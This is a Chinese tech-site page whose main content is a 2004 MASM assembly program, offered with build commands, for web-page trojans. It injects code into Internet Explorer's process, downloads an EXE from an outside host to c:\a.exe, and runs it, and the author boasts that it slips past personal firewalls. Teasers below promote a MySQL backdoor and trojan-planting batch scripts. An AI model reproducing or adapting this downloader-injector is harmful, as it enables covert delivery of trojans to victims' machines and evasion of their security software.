解决下载木马程序时网页暂停或报错问题的程序代码
大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。
编绎参数:
C:\masm32\BIN>type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# #
; # Injection downloadcode in IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# # ;test on win2k server sp4 masm8 .386
.model flat,stdcall
option casemap:none include ../include/user32.inc
includelib ../lib/user32.lib
include ../include/kernel32.inc
includelib ../lib/kernel32.lib
include ../include/windows.inc
.data
hello db ’2K下建远程线程’,0
tit db ’IEFrame’,0
szFormat db ’PID是:%d’,0
szBuffer dd 20 dup(0),0
pid dd 0
hProcess dd 0
hThread dd 0
pCodeRemote dd 0
path1 db ’c:\a.EXE’,0 .const
szmsg db ’URLDownloadToFileA’,0
userdll db ’Urlmon.dll’,0
;szmsg db ’MessageBoxA’,0
;userdll db ’User32.dll’,0
szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟
kerdll db ’kernel32.dll’,0 .code
codebegin:
dispdata db "http://192.168.0.5/NBTreeList.exe",0
szTit db "c:\a.exe",0
datalen =$-codebegin
Rproc proc msgbox ;MessageBoxA的地址为参数
CALL @F ;push esi
@@:
POP EBX
SUB EBX,OFFSET @B
LEA ECX,[EBX dispdata]
LEA EDX,[EBX szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret ;重要
Rproc endp
codelen =$-codebegin ;代码长度xx字节 start:
;invoke FindWindow,0,offset tit ;返回计算器窗口句柄
invoke FindWindow,offset tit,0
invoke GetWindowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号
;invoke wsprintf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄
mov hProcess,eax ;保存进程句柄
invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pCodeRemote,eax
invoke WriteProcessMemory,hProcess,pCodeRemote,offset codebegin,codelen,NULL mov esi,pCodeRemote
add esi,datalen
push esi
invoke LoadLibrary,offset userdll
invoke GetProcAddress,eax,offset szmsg
pop esi
invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0 mov hThread,eax ; 返回线程句柄
.if hThread
invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束
invoke CloseHandle,hThread ;关闭线程句柄
.endif invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间
invoke CloseHandle,hProcess ;关闭进程句柄
invoke WinExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;invoke MessageBoxA,0,offset szBuffer,offset szBuffer,1
invoke ExitProcess,0
end start
热备份路由器协议详解 vmac地址由哪些部分组成?
Part I: FundamentalHSRP(Hot Standby Router Protocol):Cisco私有的第3层协议。HSRP为IP网络提供网络冗余,确保用户流量能立即并透明地恢复网络边界设备或接入电路中的第一跳故障。在LAN中,多个router组成
详情2018-02-03 14:32:39责编:llp 来源:驱动管家mysql backdoor的使用方法 安装mysql backdoor的步骤
Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的 "state "函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木
详情2018-02-09 14:05:40责编:llp 来源:驱动管家ddos攻击怎么防范?如何保护你的网络?
很多新手站长对DDoS攻击这一名词并不陌生,但什么是DDoS攻击,应该怎么防范不太清楚,现在我们用很通俗的语言来给大家解释一下:DDoS攻击其实就是一种利用某种技术手段将目标服务器与互联网连接的所有通道堵死,
详情2018-02-05 08:52:11责编:llp 来源:驱动管家从两方面防范ddos攻击:应对ddos攻击和预防ddos攻击为主
DDoS攻击是利用一批受控制的机器向一台机器发起攻击,这样来势迅猛的攻击令人难以防备,因此具有较大的破坏性。如果说以前网络管理员对抗Dos可以采取过滤IP地址方法的话,那么面对当前DDoS众多伪造出来的地址则显
详情2018-02-13 13:21:23责编:llp 来源:驱动管家怎么设计密码才能保护你的网站,让黑客难以破解?
美国一家密码管理应用提供商SplashData 公司近期总结出2012年度最差的25个密码,美国《纽约时报》作家尼克尔·佩尔荣斯近日撰文指出,密码要想不被黑客猜中,有几点非常重要的注意事项。以下为文章全文:从事网
详情2018-02-02 13:28:24责编:llp 来源:驱动管家什么是云火墙?什么是云防火墙?
云火墙:来源:思科推广ASA时定义第五代防火墙的一个文案概念;技术:传通防火墙支持云端策略库更新与云端接入(SSLVPN)云端监控(Netflow)等与云相关的功能;实体:还是部署在企业CPE侧与数据中心等网关位置。
详情2018-02-08 17:28:01责编:llp 来源:驱动管家电脑文件夹怎么加密?电脑加密需要走这三步
很多时候出于安全方面的考虑,无论是家庭用户还是企业用户,电脑中都会或多或少有一些重要数据,系统崩溃了可以重装,硬件损坏了可以再去买,但如果是数据被泄密,那带来的损失就无法估计了。除了及时做好备份外
详情2018-01-28 08:58:15责编:llp 来源:驱动管家autorun.inf病毒有什么现象?删除autorun.inf如何做?
病毒现象1) 安全模式无法进入。2) 注册表HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Image File Execution Options下多出了许多劫持项,导致一些安全类软件和工具无法打开。图1:
详情2018-01-28 09:33:56责编:llp 来源:驱动管家怎么利用xuas系统通杀oday漏洞拿到网站权限?
google关键字:inurl:news_more asp?lm2= (关键字很多的自己定义吧)1、 admin admin_news_pl_view asp?id=1 id任意 填入以下语句2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷
详情2018-02-08 11:35:03责编:llp 来源:驱动管家六种入侵批处理程序代码 怎么自动挂马改主页?
DOS批处理就是,将一些之前预备好的需要多次统一运行的DOS命令写在一起,每次只要输入一次批处理就可以达到将其包含的所有DOS命令排头输入一遍的效果,这样就可以大大的节省时间提高效率。下面为大家介绍六种入侵
详情2018-02-03 10:57:13责编:llp 来源:驱动管家
- 分析iss日志找寻网站为什么被黑?怎么被黑?
- MTK手机驱动能不能在电脑上安装?win8 64位怎么安装MTK手机驱动
- win8系统怎么卸载不兼容的打印机驱动?三个小步骤即可搞定
- wps页眉页脚怎么删除?wps如何删除页眉页脚的方法
- cad图纸打印出来为什么看不清颜色?cad图纸打印问题解决
- 什么是增距镜头?增距镜头的介绍
- 什么叫做uv镜头?uv镜头的详细介绍
- 华为又面临一大考验?小米公司表示很重视美国市场
- 镁光将发布UFS 2.1闪存 性能提升50%
- 【游戏攻略】《绝地求生大逃杀》巷战怎么打?巷战心得分享
- 电脑出现蓝屏代码0x00000050是什么原因?如何解决
- 大神note3发布会海报曝光 大神note3发布会什么时候召开?
- 新浪微博能不能设置评论权限?在哪里可以设置
- 怎么用beff+msf工具在kall内网利用xss拿内网主机?
- cad字体样式缺少怎么办?cad怎么填补指定的字体样式?
- 佳能相机镜头缩不回去是怎么回事?如何解决
- 【游戏攻略】《绝地求生大逃杀》压枪技巧教学 如何压枪扫射?
- 在热血无赖的时候出现闪退现象怎么办?
- 遇到电脑蓝屏现象应该怎么解决?电脑蓝屏的原因
- 电脑开机几秒后就自动关机是什么原因?如何解决